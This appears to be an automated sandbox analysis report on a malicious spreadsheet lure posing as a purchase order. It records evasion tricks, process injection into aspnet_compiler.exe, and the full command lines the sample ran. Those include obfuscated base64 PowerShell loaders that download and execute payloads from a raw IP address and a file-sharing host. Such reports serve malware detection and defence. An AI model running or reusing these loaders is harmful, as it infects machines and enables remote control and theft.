Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: PO#BBGR2411PO69.xls	Stream path 'MBD007009DB/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: PO#BBGR2411PO69.xls	Stream path 'Workbook' entropy: 7.99849766453 (max. 8.0)
Source: 09230000.0.dr	Stream path 'MBD007009DB/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: 09230000.0.dr	Stream path 'Workbook' entropy: 7.99844135628 (max. 8.0)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 27_2_00AC0101 rdtsc

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1536	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8392	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1166	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7777	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1270
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1565
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6156

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\mshta.exe TID: 3704	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888	Thread sleep count: 1536 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888	Thread sleep count: 8392 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2052	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080	Thread sleep time: -3600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 748	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316	Thread sleep count: 1270 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316	Thread sleep count: 1565 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2148	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1212	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132	Thread sleep count: 1421 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132	Thread sleep count: 6156 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572	Thread sleep time: -3000000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1872	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3768	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3716	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 27_2_00AC0101 rdtsc

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 27_2_00A707AC NtCreateMutant,LdrInitializeThunk,

27_2_00A707AC

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A60080 mov ecx, dword ptr fs:[00000030h]	27_2_00A60080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A600EA mov eax, dword ptr fs:[00000030h]	27_2_00A600EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A826F8 mov eax, dword ptr fs:[00000030h]	27_2_00A826F8

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6Q